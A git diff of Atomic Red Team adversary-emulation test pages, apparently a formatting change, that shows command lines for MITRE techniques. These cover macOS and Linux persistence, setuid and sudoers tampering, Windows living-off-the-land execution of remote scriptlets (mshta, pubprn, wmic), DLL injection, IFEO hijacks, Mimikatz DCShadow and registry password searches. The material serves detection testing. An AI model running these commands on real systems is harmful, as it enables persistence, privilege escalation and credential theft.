+#### Run it with these steps! 1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons 2.
diff --git a/atomics/T1163/T1163.md b/atomics/T1163/T1163.md
index fa796830..576f6f10 100644
--- a/atomics/T1163/T1163.md
+++ b/atomics/T1163/T1163.md
@@ -19,8 +19,7 @@ Modify rc.common **Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common ```
diff --git a/atomics/T1164/T1164.md b/atomics/T1164/T1164.md
index 60fc1e91..9b572276 100644
--- a/atomics/T1164/T1164.md
+++ b/atomics/T1164/T1164.md
@@ -21,8 +21,7 @@ Plist Method **Supported Platforms:** macOS
-#### Run it with these steps!
-1. create a custom plist:
+#### Run it with these steps! 1. create a custom plist: ~/Library/Preferences/com.apple.loginwindow.plist
@@ -47,8 +46,7 @@ Mac Defaults |------|-------------|------|---------------| | script | path to script | path | /path/to/script|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` sudo defaults write com.apple.loginwindow LoginHook #{script} sudo defaults delete com.apple.loginwindow LoginHook ```
diff --git a/atomics/T1165/T1165.md b/atomics/T1165/T1165.md
index 2d5f7e50..bd9b8467 100644
--- a/atomics/T1165/T1165.md
+++ b/atomics/T1165/T1165.md
@@ -21,8 +21,7 @@ Modify or create an file in StartupItems **Supported Platforms:** macOS
-#### Run it with these steps!
-1. /Library/StartupItems/StartupParameters.plist
+#### Run it with these steps! 1. /Library/StartupItems/StartupParameters.plist
@@ -39,8 +38,7 @@ Establish persistence via a rule run by emond daemon at startup, based on https: |------|-------------|------|---------------| | plist | Path to emond plist file | path | /path/to/T1165_emond.plist|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` sudo cp "#{plist}" /etc/emond.d/rules/T1165_emond.plist sudo touch /private/var/db/emondClients/T1165 #Clean up
diff --git a/atomics/T1166/T1166.md b/atomics/T1166/T1166.md
index 6048cc50..2837d6fe 100644
--- a/atomics/T1166/T1166.md
+++ b/atomics/T1166/T1166.md
@@ -26,8 +26,7 @@ Setuid and Setgid |------|-------------|------|---------------| | payload | hello.c payload | path | hello.c|
-#### Run it with these steps!
-1. make hello
+#### Run it with these steps! 1. make hello 2. sudo chown root hello
@@ -50,8 +49,7 @@ This test sets the SetUID flag on a file in Linux and macOS. |------|-------------|------|---------------| | file_to_setuid | Path of file to set SetUID flag | path | /tmp/evilBinary|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` sudo chown root #{file_to_setuid} sudo chmod u+s #{file_to_setuid} ```
@@ -69,8 +67,7 @@ This test sets the SetGID flag on a file in Linux and macOS. |------|-------------|------|---------------| | file_to_setuid | Path of file to set SetGID flag | path | /tmp/evilBinary|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` sudo chown root #{file_to_setuid} sudo chmod g+s #{file_to_setuid} ```
diff --git a/atomics/T1168/T1168.md b/atomics/T1168/T1168.md
index 0010420e..8ce66670 100644
--- a/atomics/T1168/T1168.md
+++ b/atomics/T1168/T1168.md
@@ -39,8 +39,7 @@ This test replaces the current user's crontab file with the contents of the refe | command | Command to execute | string | /tmp/evil.sh| | tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ``` echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} ```
@@ -58,8 +57,7 @@ This test adds a script to a cron folder configured to execute on a schedule. Th | command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log| | cron_script_name | Name of file to store in cron folder | string | persistevil|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ``` echo "#{command}" > /etc/cron.daily/#{cron_script_name} ```
@@ -71,8 +69,7 @@ This test adds persistence via a plist to execute via the macOS Event Monitor Da **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with these steps!
-1. Place this file in /etc/emond.d/rules/atomicredteam.plist
+#### Run it with these steps! 1. Place this file in /etc/emond.d/rules/atomicredteam.plist
diff --git a/atomics/T1169/T1169.md b/atomics/T1169/T1169.md
index 7cd300a2..4cada5f5 100644
--- a/atomics/T1169/T1169.md
+++ b/atomics/T1169/T1169.md
@@ -17,8 +17,7 @@ Common Sudo enumeration methods. **Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` sudo -l sudo su cat /etc/sudoers
diff --git a/atomics/T1170/T1170.md b/atomics/T1170/T1170.md
index c5a7cedf..be3c4d5a 100644
--- a/atomics/T1170/T1170.md
+++ b/atomics/T1170/T1170.md
@@ -28,8 +28,7 @@ Test execution of a remote script using mshta.exe |------|-------------|------|---------------| | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close(); ```
diff --git a/atomics/T1173/T1173.md b/atomics/T1173/T1173.md
index f5d4a7f9..3b19fafd 100644
--- a/atomics/T1173/T1173.md
+++ b/atomics/T1173/T1173.md
@@ -19,8 +19,7 @@ Executes commands via DDE using Microsfot Word **Supported Platforms:** Windows
-#### Run it with these steps!
-Open Microsoft Word
+#### Run it with these steps! Open Microsoft Word Insert tab -> Quick Parts -> Field
diff --git a/atomics/T1174/T1174.md b/atomics/T1174/T1174.md
index 5f8be027..496da46b 100644
--- a/atomics/T1174/T1174.md
+++ b/atomics/T1174/T1174.md
@@ -24,8 +24,7 @@ Uses PowerShell to install and register a password filter DLL. Requires a reboot |------|-------------|------|---------------| | input_dll | Path to DLL to be installed and registered | Path | C:\AtomicRedTeam\atomics\T1174\src\AtomicPasswordFilter.dll|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" $notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md
index 5ee85808..23df705a 100644
--- a/atomics/T1176/T1176.md
+++ b/atomics/T1176/T1176.md
@@ -21,8 +21,7 @@ xxx **Supported Platforms:** Linux, Windows, macOS
-#### Run it with these steps!
-1. Navigate to [chrome://extensions](chrome://extensions) and
+#### Run it with these steps! 1. Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. 2. Click 'Load unpacked extension...' and navigate to
@@ -40,8 +39,7 @@ xxx **Supported Platforms:** Linux, Windows, macOS
-#### Run it with these steps!
-1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
+#### Run it with these steps! 1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome 2. Click 'Add to Chrome'
@@ -56,8 +54,7 @@ Create a file called test.wma, with the duration of 30 seconds **Supported Platforms:** Linux, Windows, macOS
-#### Run it with these steps!
-1. Navigate to [about:debugging](about:debugging) and
+#### Run it with these steps! 1. Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" 2. Navigate to [manifest.json](./manifest.json)
diff --git a/atomics/T1179/T1179.md b/atomics/T1179/T1179.md
index 58c442f1..9af31381 100644
--- a/atomics/T1179/T1179.md
+++ b/atomics/T1179/T1179.md
@@ -33,8 +33,7 @@ Hooks functions in PowerShell to read TLS Communications | file_name | Dll To Inject | Path | C:\AtomicRedTeam\atomics\T1179\bin\T1179x64.dll| | server_name | TLS Server To Test Get Request | Url | https://www.example.com|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` mavinject $pid /INJECTRUNNING #{file_name} curl #{server_name} ```
diff --git a/atomics/T1180/T1180.md b/atomics/T1180/T1180.md
index 97eafb50..62ac20dc 100644
--- a/atomics/T1180/T1180.md
+++ b/atomics/T1180/T1180.md
@@ -29,8 +29,7 @@ This test copies a binary into the Windows System32 folder and sets it as the sc
 |------|-------------|------|---------------|
 | input_binary | Executable binary to use in place of screensaver for persistence | path | C:\Windows\System32\cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverTimeout /t REG_SZ /d 60 /f
diff --git a/atomics/T1183/T1183.md b/atomics/T1183/T1183.md
index 145d6399..f600b8ac 100644
--- a/atomics/T1183/T1183.md
+++ b/atomics/T1183/T1183.md
@@ -37,8 +37,7 @@ Leverage Global Flags Settings
 | target_binary | Binary To Attach To | Path | winword.exe|
 | payload_binary | Binary To Execute | Path | cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
 ```
@@ -56,8 +55,7 @@ Leverage Global Flags Settings
 | target_binary | Binary To Attach To | Path | notepad.exe|
 | payload_binary | Binary To Execute | Path | cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512
 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1
 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
 ```
diff --git a/atomics/T1191/T1191.md b/atomics/T1191/T1191.md
index fa2ee84e..cd9fe067 100644
--- a/atomics/T1191/T1191.md
+++ b/atomics/T1191/T1191.md
@@ -26,8 +26,7 @@ Adversaries may supply CMSTP.exe with INF files infected with malicious commands
 |------|-------------|------|---------------|
 | inf_file_path | Path to the INF file | path | T1191.inf|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 cmstp.exe /s #{inf_file_path}
 ```
@@ -44,8 +43,7 @@ Adversaries may invoke cmd.exe (or other malicious commands) by embedding them i
 |------|-------------|------|---------------|
 | inf_file_uac | Path to the INF file | path | T1191_uacbypass.inf|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 cmstp.exe /s #{inf_file_uac} /au
 ```
diff --git a/atomics/T1193/T1193.md b/atomics/T1193/T1193.md
index bd02af64..18e416ac 100644
--- a/atomics/T1193/T1193.md
+++ b/atomics/T1193/T1193.md
@@ -18,8 +18,7 @@ The below will successfully download the macro-enabled Excel file to the current
 **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){
 return 'Please install Microsoft Excel before running this test.'
 }
diff --git a/atomics/T1196/T1196.md b/atomics/T1196/T1196.md
index c458b43c..667d9690 100644
--- a/atomics/T1196/T1196.md
+++ b/atomics/T1196/T1196.md
@@ -24,8 +24,7 @@ This test simulates an adversary leveraging control.exe to execute a payload and
 |------|-------------|------|---------------|
 | cpl_file_path | path to cpl file | path | calc.cpl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 control.exe #{cpl_file_path}
 ```
diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md
index a5281693..18d29e36 100644
--- a/atomics/T1197/T1197.md
+++ b/atomics/T1197/T1197.md
@@ -32,8 +32,7 @@ and execute a payload
 | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
 | local_file | Local file path to save downloaded file | path | C:\Windows\Temp\bitsadmin_flag.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
 ```
@@ -52,8 +51,7 @@ and execute a payload leveraging PowerShell
 | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
 | local_file | Local file path to save downloaded file | path | C:\Windows\Temp\bitsadmin_flag.ps1|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}
 ```
@@ -75,8 +73,7 @@ and execute a payload in multiple steps. This job will remain in the BITS queue
 | command_path | Path of command to execute | path | C:\Windows\system32\notepad.exe|
 | command_line | Command line to execute | string | C:\Windows\Temp\bitsadmin_flag.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 bitsadmin.exe /create #{bits_job_name}
 bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
 bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md
index 1191b36d..43bddab0 100644
--- a/atomics/T1201/T1201.md
+++ b/atomics/T1201/T1201.md
@@ -40,8 +40,7 @@ Lists the password complexity policy to console on Ubuntu Linux.
 **Supported Platforms:** Ubuntu
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 cat /etc/pam.d/common-password
 ```
@@ -53,8 +52,7 @@ Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.
 **Supported Platforms:** CentOS
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 cat /etc/security/pwquality.conf
 ```
@@ -66,8 +64,7 @@ Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.
 **Supported Platforms:** CentOS
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 cat /etc/pam.d/system-auth
 cat /etc/security/pwquality.conf
@@ -81,8 +78,7 @@ Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
 **Supported Platforms:** Linux
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 cat /etc/login.defs
 ```
@@ -94,8 +90,7 @@ Lists the local password policy to console on Windows.
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 net accounts
 ```
@@ -107,8 +102,7 @@ Lists the domain password policy to console on Windows.
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 net accounts /domain
 ```
@@ -120,8 +114,7 @@ Lists the password policy to console on Windows.
 **Supported Platforms:** macOS
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 pwpolicy getaccountpolicies
 ```
diff --git a/atomics/T1202/T1202.md b/atomics/T1202/T1202.md
index 1085d8e6..c4d2b7a8 100644
--- a/atomics/T1202/T1202.md
+++ b/atomics/T1202/T1202.md
@@ -28,8 +28,7 @@ The Program Compatibility Assistant (pcalua.exe) may invoke the execution of pro
 | payload_path | Path to payload | path | c:\temp\payload.dll|
 | payload_cpl_path | Path to payload | path | C:\Windows\system32\javacpl.cpl -c Java|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 pcalua.exe -a #{process}
 pcalua.exe -a #{payload_path}
 pcalua.exe -a #{payload_cpl_path}
@@ -52,8 +51,7 @@ forfiles.exe may invoke the execution of programs and commands from a Command-Li
 |------|-------------|------|---------------|
 | process | Process to execute | string | calc.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
 forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
 ```
diff --git a/atomics/T1206/T1206.md b/atomics/T1206/T1206.md
index 7f78c607..c5958ccc 100644
--- a/atomics/T1206/T1206.md
+++ b/atomics/T1206/T1206.md
@@ -21,8 +21,7 @@ Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous
 **Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
 sudo visudo -c -f /etc/sudoers
 ```
@@ -35,8 +34,7 @@ Sets sudo caching tty_tickets value to disabled. This is dangerous to modify wit
 **Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
 sudo visudo -c -f /etc/sudoers
 ```
diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md
index 574248f2..ceb41dd0 100644
--- a/atomics/T1207/T1207.md
+++ b/atomics/T1207/T1207.md
@@ -22,8 +22,7 @@ Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller
 **Supported Platforms:** Windows
-#### Run it with these steps!
-1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
+#### Run it with these steps! 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
 2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes.
 3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480
 4. lsadump::dcshadow /push
diff --git a/atomics/T1214/T1214.md b/atomics/T1214/T1214.md
index 5079e632..8d7b7be2 100644
--- a/atomics/T1214/T1214.md
+++ b/atomics/T1214/T1214.md
@@ -20,8 +20,7 @@ Queries to enumerate for credentials in the Registry.
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg query HKLM /f password /t REG_SZ /s
 reg query HKCU /f password /t REG_SZ /s
 ```
diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md
index 77f15e5d..ac85be65 100644
--- a/atomics/T1216/T1216.md
+++ b/atomics/T1216/T1216.md
@@ -24,8 +24,7 @@ Executes the signed PubPrn.vbs script with options to download and execute an ar
 |------|-------------|------|---------------|
 | remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
 ```
diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md
index 32c8e9aa..afe25fa0 100644
--- a/atomics/T1217/T1217.md
+++ b/atomics/T1217/T1217.md
@@ -21,8 +21,7 @@ Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that
 **Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
 ```
@@ -34,8 +33,7 @@ Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookm
 **Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
 ```
diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index 8b146ee9..4a0369df 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -48,8 +48,7 @@ Injects arbitrary DLL into running process specified by process ID. Requires Win
 | dll_payload | DLL to inject | Path | C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll|
 | process_id | PID of process receiving injection | string | 1000|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
 ```
@@ -66,8 +65,7 @@ Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires
 |------|-------------|------|---------------|
 | powershell_code | PowerShell code to execute | string | Start-Process calc.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 SyncAppvPublishingServer.exe "n; #{powershell_code}"
 ```
@@ -84,8 +82,7 @@ Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can
 |------|-------------|------|---------------|
 | dll_payload | DLL to execute | Path | C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
 ```
diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md
index dcc29282..49f7e327 100644
--- a/atomics/T1220/T1220.md
+++ b/atomics/T1220/T1220.md
@@ -40,8 +40,7 @@ Executes the code specified within a XSL script tag during XSL transformation us
 | xmlfile | Location of the test XML file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml|
 | xslfile | Location of the test XSL script file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
 ```
@@ -59,8 +58,7 @@ Executes the code specified within a XSL script tag during XSL transformation us
 | xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml|
 | xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
 ```
@@ -78,8 +76,7 @@ Executes the code specified within a XSL script using a local payload.
 | wmic_command | WMI command to execute using wmic.exe | string | process list|
 | local_xsl_file | Location of the test XSL script file on the local filesystem. | path | C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
 ```
@@ -97,8 +94,7 @@ Executes the code specified within a XSL script using a remote payload.
 | wmic_command | WMI command to execute using wmic.exe | string | process list|
 | remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
 ```
diff --git a/atomics/T1222/T1222.md b/atomics/T1222/T1222.md
index 6f3882ac..168626f9 100644
--- a/atomics/T1222/T1222.md
+++ b/atomics/T1222/T1222.md
@@ -52,8 +52,7 @@ Modifies the filesystem permissions of the specified file or folder to take owne
 |------|-------------|------|---------------|
 | file_folder_to_own | Path of the file or folder for takeown to take ownership. | path | C:\AtomicRedTeam\atomics\T1222\T1222.yaml|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 takeown.exe /f #{file_folder_to_own}
 ```
@@ -70,8 +69,7 @@ Modifies the filesystem permissions of the specified folder to take ownership of
 |------|-------------|------|---------------|
 | folder_to_own | Path of the folder for takeown to take ownership. | path | C:\AtomicRedTeam\atomics\T1222|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 takeown.exe /f #{folder_to_own} /r
 ```
@@ -89,8 +87,7 @@ Modifies the filesystem permissions of the specified file or folder to allow the
 | file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222\T1222.yaml|
 | user_or_group | User or group to allow full control | string | Everyone|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 cacls.exe #{file_or_folder} /grant #{user_or_group}:F
 ```
@@ -108,8 +105,7 @@ Modifies the filesystem permissions of the specified folder and contents to allo
 | file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222|
 | user_or_group | User or group to allow full control | string | Everyone|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 cacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
 ```
@@ -127,8 +123,7 @@ Modifies the filesystem permissions of the specified file or folder to allow the
 | file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222\T1222.yaml|
 | user_or_group | User or group to allow full control | string | Everyone|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 icacls.exe #{file_or_folder} /grant #{user_or_group}:F
 ```
@@ -146,8 +141,7 @@ Modifies the filesystem permissions of the specified folder and contents to allo
 | file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222|
 | user_or_group | User or group to allow full control | string | Everyone|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 icacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
 ```
@@ -164,8 +158,7 @@ Removes the read-only attribute from a file or folder using the attrib.exe comma
 |------|-------------|------|---------------|
 | file_or_folder | Path of the file or folder remove attribute. | path | C:\AtomicRedTeam\atomics\T1222|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 attrib.exe -r #{file_or_folder}
 ```
@@ -183,8 +176,7 @@ Changes a file or folder's permissions using chmod and a specified numeric mode.
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
 | numeric_mode | Specified numeric mode value | string | 755|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 chmod #{numeric_mode} #{file_or_folder}
 ```
@@ -202,8 +194,7 @@ Changes a file or folder's permissions using chmod and a specified symbolic mode
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
 | symbolic_mode | Specified symbolic mode value | string | a+w|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 chmod #{symbolic_mode} #{file_or_folder}
 ```
@@ -221,8 +212,7 @@ Changes a file or folder's permissions recursively using chmod and a specified n
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
 | numeric_mode | Specified numeric mode value | string | 755|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 chmod #{numeric_mode} #{file_or_folder} -R
 ```
@@ -240,8 +230,7 @@ Changes a file or folder's permissions recursively using chmod and a specified s
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
 | symbolic_mode | Specified symbolic mode value | string | a+w|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 chmod #{symbolic_mode} #{file_or_folder} -R
 ```
@@ -260,8 +249,7 @@ Changes a file or folder's ownership and group information using chown.
 | owner | Username of desired owner | string | root|
 | group | Group name of desired group | string | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 chown #{owner}:#{group} #{file_or_folder}
 ```
@@ -280,8 +268,7 @@ Changes a file or folder's ownership and group information recursively using cho
 | owner | Username of desired owner | string | root|
 | group | Group name of desired group | string | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 chown #{owner}:#{group} #{file_or_folder} -R
 ```
@@ -299,8 +286,7 @@ Changes a file or folder's ownership only using chown.
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222/T1222.yaml|
 | owner | Username of desired owner | string | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 chown #{owner} #{file_or_folder}
 ```
@@ -318,8 +304,7 @@ Changes a file or folder's ownership only recursively using chown.
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
 | owner | Username of desired owner | string | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 chown #{owner} #{file_or_folder} -R
 ```
@@ -337,8 +322,7 @@ This technique was used by the threat actor Rocke during the compromise of Linux
 |------|-------------|------|---------------|
 | file_to_modify | Path of the file | path | /var/spool/cron/root|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 chattr -i #{file_to_modify}
 ```
diff --git a/atomics/T1223/T1223.md b/atomics/T1223/T1223.md
index f1a6d3db..b3158791 100644
--- a/atomics/T1223/T1223.md
+++ b/atomics/T1223/T1223.md
@@ -24,8 +24,7 @@ Uses hh.exe to execute a local compiled HTML Help payload.
 |------|-------------|------|---------------|
 | local_chm_file | Local .chm payload | path | C:\atomic-red-team\atomics\T1223\src\T1223.chm|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 hh.exe #{local_chm_file}
 ```
@@ -42,8 +41,7 @@ Uses hh.exe to execute a remote compiled HTML Help payload.
 |------|-------------|------|---------------|
 | remote_chm_file | Remote .chm payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1223/src/T1223.chm|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 hh.exe #{remote_chm_file}
 ```
diff --git a/atomics/T1482/T1482.md b/atomics/T1482/T1482.md
index 170c7bc3..1728911a 100644
--- a/atomics/T1482/T1482.md
+++ b/atomics/T1482/T1482.md
@@ -18,8 +18,7 @@ Requires the installation of dsquery via Windows RSAT or the Windows Server AD D
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 dsquery * -filter "(objectClass=trustedDomain)" -attr *
 ```
@@ -33,8 +32,7 @@ This technique has been used by the Trickbot malware family.
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 nltest /domain_trusts
 ```
diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index b58bf90b..1ad587e8 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
